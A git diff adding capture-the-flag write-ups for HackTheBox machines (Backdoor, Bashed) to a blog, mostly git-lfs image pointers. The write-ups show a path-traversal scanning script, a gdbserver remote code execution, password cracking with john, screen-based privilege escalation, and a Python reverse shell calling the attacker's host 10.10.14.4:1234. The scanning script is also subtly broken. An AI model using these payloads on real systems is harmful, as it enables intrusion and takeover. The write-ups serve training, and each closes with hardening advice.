146c8358cf1a95413c502bd02a070c1caad48287720364005117067d5b04a4dc4ae3220443c400a4f4083b9110cb20783e5bf3412dcfbaff12e82f282b7749c412a4d52513814da147f0a40ad058f49c0216e980436af8455f6b1cecd4e6ace6877baf640fb8fadb3e92177343581aa96fbab2901b9226407273ab8568c1a2c7600493b741b809f817aa18d521f5cda1571461b67159a46272f51160f5790fa919019b8facbb70777f948654d895284992c0db9da7b87df843324fc43165c63d504f78b770f2612b9c88c598bc1dbd80d593f738d965b5593cd25fc41a53e1bf9f8095e99ef84aeac8c7426ba36af8aa036dac6440cb2412d5c0c7b626630931f0aee1b0dd469bc94f17f5ebed590bed26c6865916d0213d9f411723b4efb09f3f0d5043036
+```
+Bingo, the command finds the hash of the administrator of the machine, now we can perform a dictionary attack locally using john. To do this I use the following command:
+
+
+```bash
+john output.txt --wordlist=Documents/wordlist/rockyou.txt
+```
+![](img/image-9.webp)
+
+After a few seconds, John gives me the password for the administrator account: `Ticketmaster1968`.
+
+I can verify that the credentials work well with `smbmap` :
+
+![](img/image-10.webp)
+
+Then I can create a reverse shell with `psexec`:
+
+![](img/image-11.webp)
+
+I now have a shell as `NT authority` authority and I can get the last flag.
+
+
+```bash
+C:\Users\Administrator\Desktop> more root.txt
+7255a7f4f435814c28a5e8b51aabb4b4
+```
+## Recommendations
+
+To patch this host I think it would be necessary to perform a number of actions:
+
+- Do not leave the `Policies` file accessible to everyone
+- Disable SMB anonymous access
+- Use a strong password for the administrator account
diff --git a/content/writeup-ctf/writeup-backdoor-htb/featured.png b/content/writeup-ctf/writeup-backdoor-htb/featured.png
new file mode 100644
index 0000000..38f3539
--- /dev/null
+++ b/content/writeup-ctf/writeup-backdoor-htb/featured.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:9483ec3250f81cd7446feb84946ad4ffd3371bdc18f53912e93d4a61ed94d44f
+size 272821
diff --git a/content/writeup-ctf/writeup-backdoor-htb/featured.webp b/content/writeup-ctf/writeup-backdoor-htb/featured.webp
new file mode 100644
index 0000000..c6d2af1
--- /dev/null
+++ b/content/writeup-ctf/writeup-backdoor-htb/featured.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:30a7d8ba038a5f5bb70fa58841e7726ae34ee8c9aa8357ba0d5615dc842d4ea8
+size 28208
diff --git a/content/writeup-ctf/writeup-backdoor-htb/img/image-1.png b/content/writeup-ctf/writeup-backdoor-htb/img/image-1.png
new file mode 100644
index 0000000..49ce4d3
--- /dev/null
+++ b/content/writeup-ctf/writeup-backdoor-htb/img/image-1.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:6c5aa8af5883edee76b64d05ba2cfcca4da106ea380ce1f6d2308d07902a367a
+size 56775
diff --git a/content/writeup-ctf/writeup-backdoor-htb/img/image-1.webp b/content/writeup-ctf/writeup-backdoor-htb/img/image-1.webp
new file mode 100644
index 0000000..d0f03d7
--- /dev/null
+++ b/content/writeup-ctf/writeup-backdoor-htb/img/image-1.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:85f74302b41a28bcf7e402d095f54e2c9fd7183baf22ac274467feb6be4d7c7c
+size 48384
diff --git a/content/writeup-ctf/writeup-backdoor-htb/img/image-10.png b/content/writeup-ctf/writeup-backdoor-htb/img/image-10.png
new file mode 100644
index 0000000..85aa185
--- /dev/null
+++ b/content/writeup-ctf/writeup-backdoor-htb/img/image-10.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:5d43e9faeca3ccfb3a91dc50dfe6bc121c2fe96d0675c34bb4b853446153f7ad
+size 9895
diff --git a/content/writeup-ctf/writeup-backdoor-htb/img/image-10.webp b/content/writeup-ctf/writeup-backdoor-htb/img/image-10.webp
new file mode 100644
index 0000000..1960dcb
--- /dev/null
+++ b/content/writeup-ctf/writeup-backdoor-htb/img/image-10.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:6b2ddd8cb93b8ddb36fd008a604c028e5bb759727201864e5b83f1b66df653d4
+size 9900
diff --git a/content/writeup-ctf/writeup-backdoor-htb/img/image-2.png b/content/writeup-ctf/writeup-backdoor-htb/img/image-2.png
new file mode 100644
index 0000000..49af0c1
--- /dev/null
+++ b/content/writeup-ctf/writeup-backdoor-htb/img/image-2.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:07134837cc71acedc53c90b683b51b33176ebc85f0bc86ef7d38a5cc762cb623
+size 2036061
diff --git a/content/writeup-ctf/writeup-backdoor-htb/img/image-2.webp b/content/writeup-ctf/writeup-backdoor-htb/img/image-2.webp
new file mode 100644
index 0000000..474f32c
--- /dev/null
+++ b/content/writeup-ctf/writeup-backdoor-htb/img/image-2.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:3ad0aad85154cb60547830e8d24e280ad77d7dd624c7dda828af0cc29b22fcc3
+size 152582
diff --git a/content/writeup-ctf/writeup-backdoor-htb/img/image-3.png b/content/writeup-ctf/writeup-backdoor-htb/img/image-3.png
new file mode 100644
index 0000000..e97971c
--- /dev/null
+++ b/content/writeup-ctf/writeup-backdoor-htb/img/image-3.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:d45350c57229a71c041f40e3a0a21832661822851220dbdda3632fde906c8c73
+size 146806
diff --git a/content/writeup-ctf/writeup-backdoor-htb/img/image-3.webp b/content/writeup-ctf/writeup-backdoor-htb/img/image-3.webp
new file mode 100644
index 0000000..a80a1d4
--- /dev/null
+++ b/content/writeup-ctf/writeup-backdoor-htb/img/image-3.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:717b6822852b51a184b64cbb1c7a67bbe8a61e6e4503421ca54ce5189937b0e5
+size 150728
diff --git a/content/writeup-ctf/writeup-backdoor-htb/img/image-4.png b/content/writeup-ctf/writeup-backdoor-htb/img/image-4.png
new file mode 100644
index 0000000..e7957cb
--- /dev/null
+++ b/content/writeup-ctf/writeup-backdoor-htb/img/image-4.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:ddff5fa5f65ccd4404856850f96e759f49fd5012e2c32ad1d06594260427fd9d
+size 86402
diff --git a/content/writeup-ctf/writeup-backdoor-htb/img/image-4.webp b/content/writeup-ctf/writeup-backdoor-htb/img/image-4.webp
new file mode 100644
index 0000000..cc960d4
--- /dev/null
+++ b/content/writeup-ctf/writeup-backdoor-htb/img/image-4.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:f53bba5f10f440209eee17cf1ee4e79d975f1123fbbb36af957ebc5035e1e36d
+size 80172
diff --git a/content/writeup-ctf/writeup-backdoor-htb/img/image-5.png b/content/writeup-ctf/writeup-backdoor-htb/img/image-5.png
new file mode 100644
index 0000000..4223052
--- /dev/null
+++ b/content/writeup-ctf/writeup-backdoor-htb/img/image-5.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:d7f3f9ed46a6989ff6e93c5795e090f24bde5e8427c3c8424de1f0da3c3cfe51
+size 30137
diff --git a/content/writeup-ctf/writeup-backdoor-htb/img/image-5.webp b/content/writeup-ctf/writeup-backdoor-htb/img/image-5.webp
new file mode 100644
index 0000000..0d542bd
--- /dev/null
+++ b/content/writeup-ctf/writeup-backdoor-htb/img/image-5.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:262a1468e81157c2352d3bd33be91295f11b0e1d359f89c699b2787cf3effe6b
+size 37318
diff --git a/content/writeup-ctf/writeup-backdoor-htb/img/image-6.png b/content/writeup-ctf/writeup-backdoor-htb/img/image-6.png
new file mode 100644
index 0000000..dfd9cbd
--- /dev/null
+++ b/content/writeup-ctf/writeup-backdoor-htb/img/image-6.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:1171d8f76c5b913ce1cdeb8c11a835d44aa6608832f4e192dd1cf327b48c236d
+size 104224
diff --git a/content/writeup-ctf/writeup-backdoor-htb/img/image-6.webp b/content/writeup-ctf/writeup-backdoor-htb/img/image-6.webp
new file mode 100644
index 0000000..10b1ebc
--- /dev/null
+++ b/content/writeup-ctf/writeup-backdoor-htb/img/image-6.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:c59d8bfcbb7cb9d907d005c1a33194bcde4472f9113cc127b232b15f3d09575e
+size 79692
diff --git a/content/writeup-ctf/writeup-backdoor-htb/img/image-7.png b/content/writeup-ctf/writeup-backdoor-htb/img/image-7.png
new file mode 100644
index 0000000..a07d9a9
--- /dev/null
+++ b/content/writeup-ctf/writeup-backdoor-htb/img/image-7.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:c509f4303696d0da7ce6c16762b9197aabdbf54b2c14b6c361ff2d6dedf4c711
+size 30680
diff --git a/content/writeup-ctf/writeup-backdoor-htb/img/image-7.webp b/content/writeup-ctf/writeup-backdoor-htb/img/image-7.webp
new file mode 100644
index 0000000..e2b5720
--- /dev/null
+++ b/content/writeup-ctf/writeup-backdoor-htb/img/image-7.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:4bf7d1bb84a822afb796215fb1409b3215a055b2515d65e83a8ea3f9211928be
+size 24924
diff --git a/content/writeup-ctf/writeup-backdoor-htb/img/image-8.png b/content/writeup-ctf/writeup-backdoor-htb/img/image-8.png
new file mode 100644
index 0000000..9e2bd6a
--- /dev/null
+++ b/content/writeup-ctf/writeup-backdoor-htb/img/image-8.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:0de7b3f0e58bf9b90c07313c52a9047cdb227fdffc1f7f8ec998fd0bcc99c1ea
+size 48003
diff --git a/content/writeup-ctf/writeup-backdoor-htb/img/image-8.webp b/content/writeup-ctf/writeup-backdoor-htb/img/image-8.webp
new file mode 100644
index 0000000..3f1386f
--- /dev/null
+++ b/content/writeup-ctf/writeup-backdoor-htb/img/image-8.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:83c50c838c20c98a7f4acb45f3fc7390008376bcdbe4c9a9a27baed7c4649de4
+size 36036
diff --git a/content/writeup-ctf/writeup-backdoor-htb/img/image-9.png b/content/writeup-ctf/writeup-backdoor-htb/img/image-9.png
new file mode 100644
index 0000000..4a53918
--- /dev/null
+++ b/content/writeup-ctf/writeup-backdoor-htb/img/image-9.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:649d76ec676c949ee8137ec7a4e0ac6aa15f9b21520552854c91b51e0b8c0453
+size 33156
diff --git a/content/writeup-ctf/writeup-backdoor-htb/img/image-9.webp b/content/writeup-ctf/writeup-backdoor-htb/img/image-9.webp
new file mode 100644
index 0000000..f046d16
--- /dev/null
+++ b/content/writeup-ctf/writeup-backdoor-htb/img/image-9.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:927ea2b85bb1fce53605558c06b992f7bdcef7ce1adfb86e7ffb484e9039a3a8
+size 31010
diff --git a/content/writeup-ctf/writeup-backdoor-htb/index.md b/content/writeup-ctf/writeup-backdoor-htb/index.md
new file mode 100644
index 0000000..87f13be
--- /dev/null
+++ b/content/writeup-ctf/writeup-backdoor-htb/index.md
@@ -0,0 +1,128 @@
+---
+title: "Writeup - Backdoor (HTB)"
+date: 2022-04-19
+slug: "writeup-backdoor-htb"
+type: "writeup-ctf"
+--- 
+
+This is a writeup for the [Backdoor](https://app.hackthebox.com/machines/Backdoor) machine from the HackTheBox site.
+
+# Enumeration
+
+First, let's start with a scan of our target with the following command:
+
+
+```bash
+nmap -sV 10.10.11.125
+```
+Three TCP ports are discovered:
+
+![](img/image-1.webp)
+
+- 22/tcp : SSH port (OpenSSH 8.2p1)
+- 80/tcp : web server (Apache 2.4.41)
+- 1337/tcp : ?????
+
+We have a site on port 80 and port 1337 that hosts an unknown service at the moment; let's see what the site looks like.
+
+![](img/image-2.webp)
+
+# Exploit
+
+After inspecting the page, I notice that it is a site based on the CMS Wordpress, let's do a scan with "WPScan" to try to identify flaws:
+
+![](img/image-3.webp)
+
+Nothing special, let's try to do an aggressive detection of the plugins. For this I use the following command:
+
+
+```bash
+wpscan --url http://backdoor.htb --plugin-detection aggressive
+```
+![](img/image-4.webp)
+
+There are two plugins: akismet and ebook-download. After some research I find that ebook-download in version 1.1 is exploitable (CVE-. 
+
+So we create a script to automate the process scan, if the page returns a message with a size greater than 82 bytes, then the process exists.
+
+
+```bash
+import requests
+
+for i in range(0,1000):
+    url = "http://backdoor.htb/wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=/proc>
+    answer=requests.get(url)
+    lg=len(answer.text)
+    if(leng>82):
+        if '1337' in resp.text:
+            print("%d %s ",lg, answer.text)
+```
+After running the script, we find 2 services:
+
+![](img/image-5.webp)
+
+These processes are gdbserver running on our mystery port: 1337. So we can now look for exploits related to this process.
+
+Je trouve rapidement le script suivant qui permet d'exécuter du code à distance via le service GDB :
+
+[GNU gdbserver 9.2 - Remote Command Execution (RCE)](https://www.exploit-db.com/exploits/50539)
+
+After generating a payload with msfvenom, I run the script :
+
+![](img/image-6.webp)
+
+I now have a shell on the remote machine, I can get the first flag.
+
+![](img/image-7.webp)
+
+# Privilege escalation
+
+First I try to find the SUID files. For that I use the following command:
+
+
+```bash
+find / -perm -u=s -type f 2>/dev/null
+```
+![](img/image-8.webp)
+
+There are a lot of usual commands. But among the list there is "screen".  It is a command that allows to manage several terminals at the same time. I look then if a process runs with this command:
+
+![](img/image-9.webp)
+
+And indeed there is a process running. But not just any process, a root shell with the options -dmS :
+
+- -d : detache de screen when started
+- -m : ignore the $STY environment variable, creation of a new session is enforced
+- -S : When creating a new session, this option can be used to specify a meaningful name
+
+So we know that a screen named root has been created with the user root. If we manage to connect to the screen, we will have access to a root shell.
+
+To connect to the detached screen we need to use the following command:
+
+
+```bash
+screen -x [name]/[user]
+```
+But before connecting we will have to define the variable $TERM, to do this I use the following command:
+
+
+```bash
+export TERM=screen
+```
+I can now connect to the root screen with the following command:
+
+
+```bash
+screen -x root/root
+```
+I now have access to a root shell and can retrieve the last flag.
+
+![](img/image-10.webp)
+
+# Recommendations
+
+To patch this host I think it would be necessary to perform a number of actions:
+
+- Update Wordpress plugin
+- Update GDB server
+- Do not run screen as root with the -m variable
diff --git a/content/writeup-ctf/writeup-bashed-htb/featured.png b/content/writeup-ctf/writeup-bashed-htb/featured.png
new file mode 100644
index 0000000..c376fff
--- /dev/null
+++ b/content/writeup-ctf/writeup-bashed-htb/featured.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:c885dac12265794e61597ad5cccdc71290e72c4411a869cd0bae02c592daaa26
+size 209998
diff --git a/content/writeup-ctf/writeup-bashed-htb/featured.webp b/content/writeup-ctf/writeup-bashed-htb/featured.webp
new file mode 100644
index 0000000..e0dfd56
--- /dev/null
+++ b/content/writeup-ctf/writeup-bashed-htb/featured.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:40ee22924a04bc9256a7ddb973cabbdc73b93a4140b63b8f61283e998f7a8140
+size 24012
diff --git a/content/writeup-ctf/writeup-bashed-htb/img/image-1.png b/content/writeup-ctf/writeup-bashed-htb/img/image-1.png
new file mode 100644
index 0000000..4074bcb
--- /dev/null
+++ b/content/writeup-ctf/writeup-bashed-htb/img/image-1.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:a7e4299b3286c7d1023c4ebec9529523d09b95bfe15daa14008df708a221ec10
+size 29417
diff --git a/content/writeup-ctf/writeup-bashed-htb/img/image-1.webp b/content/writeup-ctf/writeup-bashed-htb/img/image-1.webp
new file mode 100644
index 0000000..0e8c342
--- /dev/null
+++ b/content/writeup-ctf/writeup-bashed-htb/img/image-1.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:679e2efd5944711888b8b836115234b3eef08d2a9ba3a715d7d67ad988e639a7
+size 25806
diff --git a/content/writeup-ctf/writeup-bashed-htb/img/image-10.png b/content/writeup-ctf/writeup-bashed-htb/img/image-10.png
new file mode 100644
index 0000000..7a4da76
--- /dev/null
+++ b/content/writeup-ctf/writeup-bashed-htb/img/image-10.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:df8ea553145fed1014c2c5cbb69d2044f16a427186865e1a83313ec4aa690c88
+size 17704
diff --git a/content/writeup-ctf/writeup-bashed-htb/img/image-10.webp b/content/writeup-ctf/writeup-bashed-htb/img/image-10.webp
new file mode 100644
index 0000000..718367a
--- /dev/null
+++ b/content/writeup-ctf/writeup-bashed-htb/img/image-10.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:a24d54e59816131e08eafc8baf0a96f699c674315b8698c62dcc55c7fb8b1c72
+size 18092
diff --git a/content/writeup-ctf/writeup-bashed-htb/img/image-2.png b/content/writeup-ctf/writeup-bashed-htb/img/image-2.png
new file mode 100644
index 0000000..223a299
--- /dev/null
+++ b/content/writeup-ctf/writeup-bashed-htb/img/image-2.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:9b614006e6eee8a20d667654b0e8fe086258f5b1d5595a4bfc4167408146a3ff
+size 546813
diff --git a/content/writeup-ctf/writeup-bashed-htb/img/image-2.webp b/content/writeup-ctf/writeup-bashed-htb/img/image-2.webp
new file mode 100644
index 0000000..1147b1c
--- /dev/null
+++ b/content/writeup-ctf/writeup-bashed-htb/img/image-2.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:02fc7f9f55a308748a7dd0923385654cc2fa86ad7bd5927b778e1317924b7ee2
+size 114226
diff --git a/content/writeup-ctf/writeup-bashed-htb/img/image-3.png b/content/writeup-ctf/writeup-bashed-htb/img/image-3.png
new file mode 100644
index 0000000..1bfc513
--- /dev/null
+++ b/content/writeup-ctf/writeup-bashed-htb/img/image-3.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:14c12ee813d91a0250ab07cefeeb479251ace83a46b6dbf3b940349af7084e24
+size 75656
diff --git a/content/writeup-ctf/writeup-bashed-htb/img/image-3.webp b/content/writeup-ctf/writeup-bashed-htb/img/image-3.webp
new file mode 100644
index 0000000..7815f6d
--- /dev/null
+++ b/content/writeup-ctf/writeup-bashed-htb/img/image-3.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:72ed25b5f9bd29bf17a61f5bfc5e1a53d11594adb8af0776d7682ccaf6bc53b8
+size 66764
diff --git a/content/writeup-ctf/writeup-bashed-htb/img/image-4.png b/content/writeup-ctf/writeup-bashed-htb/img/image-4.png
new file mode 100644
index 0000000..1714b8c
--- /dev/null
+++ b/content/writeup-ctf/writeup-bashed-htb/img/image-4.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:b53a592973802bbeed1f44489f0fbba7d9a851677ebab56475f88633efc2f950
+size 21623
diff --git a/content/writeup-ctf/writeup-bashed-htb/img/image-4.webp b/content/writeup-ctf/writeup-bashed-htb/img/image-4.webp
new file mode 100644
index 0000000..950bf6a
--- /dev/null
+++ b/content/writeup-ctf/writeup-bashed-htb/img/image-4.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:8794cb6ecaac097ef1ab3a09e0b5916972f9b3d5d704d26dd0f4a1835aed71a9
+size 18556
diff --git a/content/writeup-ctf/writeup-bashed-htb/img/image-5.png b/content/writeup-ctf/writeup-bashed-htb/img/image-5.png
new file mode 100644
index 0000000..f720541
--- /dev/null
+++ b/content/writeup-ctf/writeup-bashed-htb/img/image-5.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:38c14c80e5c3eac15a6c516dcb8b95fe4e08ed9834538fbe336cea80993a2ad7
+size 32711
diff --git a/content/writeup-ctf/writeup-bashed-htb/img/image-5.webp b/content/writeup-ctf/writeup-bashed-htb/img/image-5.webp
new file mode 100644
index 0000000..b9e2101
--- /dev/null
+++ b/content/writeup-ctf/writeup-bashed-htb/img/image-5.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:67fa9e1d0cf8d1c4577fd1dd41655075c0cc5cbd8b05d821c3a43d8d90644e47
+size 28388
diff --git a/content/writeup-ctf/writeup-bashed-htb/img/image-6.png b/content/writeup-ctf/writeup-bashed-htb/img/image-6.png
new file mode 100644
index 0000000..ad6b159
--- /dev/null
+++ b/content/writeup-ctf/writeup-bashed-htb/img/image-6.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:79c02e08c4ecd571b5137f4d3cdbfe68a746128c26eb1ad63c64f16113601fc4
+size 39356
diff --git a/content/writeup-ctf/writeup-bashed-htb/img/image-6.webp b/content/writeup-ctf/writeup-bashed-htb/img/image-6.webp
new file mode 100644
index 0000000..2bd96d1
--- /dev/null
+++ b/content/writeup-ctf/writeup-bashed-htb/img/image-6.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:fd9784c9d7b0e811ccf8436b32ef4cb93b5d1c93fec1cec96265913f142e5fb3
+size 31284
diff --git a/content/writeup-ctf/writeup-bashed-htb/img/image-7.png b/content/writeup-ctf/writeup-bashed-htb/img/image-7.png
new file mode 100644
index 0000000..ffdd7a7
--- /dev/null
+++ b/content/writeup-ctf/writeup-bashed-htb/img/image-7.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:bfff9e8731e784217e86c5b269c82bc2254ca034e62c37fd5388e7f60f776e45
+size 33947
diff --git a/content/writeup-ctf/writeup-bashed-htb/img/image-7.webp b/content/writeup-ctf/writeup-bashed-htb/img/image-7.webp
new file mode 100644
index 0000000..e1d3453
--- /dev/null
+++ b/content/writeup-ctf/writeup-bashed-htb/img/image-7.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:c5d4856b5e81537e201c5bd291bde90c72d3e32b90a864b90818c67c9415df18
+size 27980
diff --git a/content/writeup-ctf/writeup-bashed-htb/img/image-8.png b/content/writeup-ctf/writeup-bashed-htb/img/image-8.png
new file mode 100644
index 0000000..8c3085a
--- /dev/null
+++ b/content/writeup-ctf/writeup-bashed-htb/img/image-8.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:88735f9e0a7e9c79da63c8187f08e21077e8bad50a6b52a5d0537cb7f6b0037e
+size 17536
diff --git a/content/writeup-ctf/writeup-bashed-htb/img/image-8.webp b/content/writeup-ctf/writeup-bashed-htb/img/image-8.webp
new file mode 100644
index 0000000..651fcf0
--- /dev/null
+++ b/content/writeup-ctf/writeup-bashed-htb/img/image-8.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:2ca27b09f87fc7716808496b8d8448651df8ed9b6caba17d2b900860c31d7fd2
+size 16878
diff --git a/content/writeup-ctf/writeup-bashed-htb/img/image-9.png b/content/writeup-ctf/writeup-bashed-htb/img/image-9.png
new file mode 100644
index 0000000..37842a6
--- /dev/null
+++ b/content/writeup-ctf/writeup-bashed-htb/img/image-9.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:3316643536bd23c6afa9046aa8bb746cbd77d8d5946aa84b3ced089c1fa16aee
+size 12076
diff --git a/content/writeup-ctf/writeup-bashed-htb/img/image-9.webp b/content/writeup-ctf/writeup-bashed-htb/img/image-9.webp
new file mode 100644
index 0000000..0030007
--- /dev/null
+++ b/content/writeup-ctf/writeup-bashed-htb/img/image-9.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:29d580ddc6c7eb025258b9e913bb315e155fb631a8879fbd35eaf8cc42cb2dae
+size 19572
diff --git a/content/writeup-ctf/writeup-bashed-htb/index.md b/content/writeup-ctf/writeup-bashed-htb/index.md
new file mode 100644
index 0000000..75050b1
--- /dev/null
+++ b/content/writeup-ctf/writeup-bashed-htb/index.md
@@ -0,0 +1,88 @@
+---
+title: "Writeup - Bashed (HTB)"
+date: 2022-05-03
+slug: "writeup-bashed-htb"
+type: "writeup-ctf"
+--- 
+
+This is a writeup for the [Bashed](https://app.hackthebox.com/machines/Bashed) machine from the HackTheBox site.
+
+## Enumeration
+
+First, let's start with a scan of our target with the following command:
+
+
+```bash
+nmap -sV -T4 -Pn 10.10.10.68
+```
+One TCP port are discovered:
+
+![](img/image-1.webp)
+
+- 80/tcp : HTTP web server (Apache 2.4.18)
+
+![](img/image-2.webp)
+
+## Exploit
+
+First, I start by scanning the site's folders.
+
+![](img/image-3.webp)
+
+Quite a few things and in particular the `/dev` folder which contains the 2 following files:
+
+![](img/image-4.webp)
+
+After some research they correspond to the following project: [phpbash](https://github.com/Arrexel/phpbash). Globally it is a cmd directly integrated in a web page. So I go to the page and start to look if there are interesting things:
+
+![](img/image-5.webp)
+
+Rather fast, we can already get the first flag!
+
+## Privilege escalation
+
+Although functional, the cmd in the browser remains limited. So I upload a PHP reverse shell in the `html/uploads` folder.
+
+![](img/image-6.webp)
+
+I now have a reverse and I can check the sudo permissions of my user.
+
+![](img/image-7.webp)
+
+![](img/image-8.webp)
+
+So he has the authorization to execute any command as `scriptmanager`. So I search for files/scripts on the machine and find the `/scripts`. I check the permissions with the following command:
+
+![](img/image-9.webp)
+
+Looking at the content of the script I realize that there is an automatic execution of the script by the root user. Indeed the file `test.txt` belongs to root and was created a short time ago.
+
+
+```bash
+f = open("test.txt", "w")
+f.write("testing 123!")
+f.close
+```
+So I modify the script with the following program:
+
+
+```bash
+import socket,subprocess,os
+s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
+s.connect(("10.10.14.4",1234))
+os.dup2(s.fileno(),0)
+os.dup2(s.fileno(),1)
+os.dup2(s.fileno(),2)
+t=subprocess.call(["/bin/sh","-i"])
+```
+After a few minutes, I have a reverse shell root and I can recover the last flag.
+
+![](img/image-10.webp)
+
+## Recommendations
+
+To patch this host I think it would be necessary to perform a number of actions:
+
+- Do not run phpbash.php directly on the machine, use containers to isolate it for example
+- Reduce the permissions of the user hosting the applications to a strict minimum
+- Do not run a script automatically as root if it can be modified by other users
diff --git a/content/writeup-ctf/writeup-biteme-thm/featured.png b/content/writeup-ctf/writeup-biteme-thm/featured.png
new file mode 100644
index 0000000..0d3827d
--- /dev/null
+++ b/content/writeup-ctf/writeup-biteme-thm/featured.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:bcee2c64acb51cce96eb84f73a43b6a69067deda7bcf099d874f23f5b31a4ad9
+size 397543
diff --git a/content/writeup-ctf/writeup-biteme-thm/featured.webp b/content/writeup-ctf/writeup-biteme-thm/featured.webp
new file mode 100644
index 0000000..1b00b88
--- /dev/null
+++ b/content/writeup-ctf/writeup-biteme-thm/featured.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:13d3bf4013cca3e7267d9506291331232d9432bfc552b4ed0588e4d4e0032f40
+size 321768
diff --git a/content/writeup-ctf/writeup-biteme-thm/img/image-1.png b/content/writeup-ctf/writeup-biteme-thm/img/image-1.png
new file mode 100644
index 0000000..a2fe741
--- /dev/null
+++ b/content/writeup-ctf/writeup-biteme-thm/img/image-1.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:54864448847abe460f53160ac41dd875500812a748e9569cae3150cf03144e21
+size 35817
diff --git a/content/writeup-ctf/writeup-biteme-thm/img/image-1.webp b/content/writeup-ctf/writeup-biteme-thm/img/image-1.webp
new file mode 100644
index 0000000..2b1eb29
--- /dev/null
+++ b/content/writeup-ctf/writeup-biteme-thm/img/image-1.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:45979071648c84705bbe3ed9a8f822932d8669fd03bf101f5abc79bf081ec665
+size 34824
diff --git a/content/writeup-ctf/writeup-biteme-thm/img/image-10.png b/content/writeup-ctf/writeup-biteme-thm/img/image-10.png
new file mode 100644
index 0000000..381b22f
--- /dev/null
+++ b/content/writeup-ctf/writeup-biteme-thm/img/image-10.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:06be53934f4e7b6b1152fee7361efa109f3cadf9df42709ec2ddb7a83bb5b591
+size 19825
diff --git a/content/writeup-ctf/writeup-biteme-thm/img/image-10.webp b/content/writeup-ctf/writeup-biteme-thm/img/image-10.webp
new file mode 100644
index 0000000..e324ad3
--- /dev/null
+++ b/content/writeup-ctf/writeup-biteme-thm/img/image-10.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:2a7463093f9159c6feb32fbbc69cb5dd639d5705de0f4bfff3da6475b21d3f75
+size 20918
diff --git a/content/writeup-ctf/writeup-biteme-thm/img/image-11.png b/content/writeup-ctf/writeup-biteme-thm/img/image-11.png
new file mode 100644
index 0000000..1b02aa6
--- /dev/null
+++ b/content/writeup-ctf/writeup-biteme-thm/img/image-11.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:539530f18c28b6476806958a5a3c0ff749d75943aa552d09b022977d4a80ac6d
+size 18565
diff --git a/content/writeup-ctf/writeup-biteme-thm/img/image-11.webp b/content/writeup-ctf/writeup-biteme-thm/img/image-11.webp
new file mode 100644
